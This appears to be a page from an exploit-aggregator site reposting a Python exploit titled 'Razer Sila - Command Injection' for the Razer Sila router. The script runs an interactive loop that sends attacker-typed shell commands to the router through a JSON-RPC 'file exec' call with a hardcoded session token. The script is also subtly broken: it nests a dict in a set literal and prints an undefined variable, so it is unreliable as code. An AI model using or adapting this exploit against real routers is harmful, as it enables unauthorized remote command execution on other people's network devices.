Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022040085

Below is a copy:

Razer Sila - Command Injection (py)
# Exploit Title: Razer Sila - Command Injection (py)
# Google Dork: N/A
# Date: 2022-04-22
# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
# Contact: [email protected]
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

import requests
import sys
import json

target = sys.argv[1]
h = {
    'Host': target,
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Length': '117',
    'Origin': target,
    'Referer': target,
    'Te': 'trailers',
    'Connection': 'close'
    }

def usage():
    print("Razer Sila - Command Injection ")
    print("Coded by Mohsen Dehghani [aka 0xProfessional]")
    print("Contact to me: [email protected]")
    print("Ex: python3 Exploit.py 127.0.0.1")
    
# Data Json
def main(url):
        while(1):
                try:
                        cmd = input("$")
                        dataJson = {
                        {"jsonrpc":"2.0","id":3,
                         "method":"call",
                         "params":["30ebdc7dd1f519beb4b2175e9dd8463e",
                                   "file",
                                   "exec",
                                   {"command":cmd}]}}
                        if cmd == 'quit' or cmd == 'exit':
                                break
                        req =  requests.post(url,headers=h,data=dataJson)
                        
                        if req.status_code == 200:
                            for jsonData in req.content:
                                print(i['stdout'])

                        else:
                                print("Router Not Vulnerable :(")
                                break
                except:
                        print("Error:(")
                                
try:
        if len(sys.argv) == 2:
                main(sys.argv[1])
        else:
                usage()
except KeyboardInterrupt as e:
        sys.exit()
        
    

    



Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.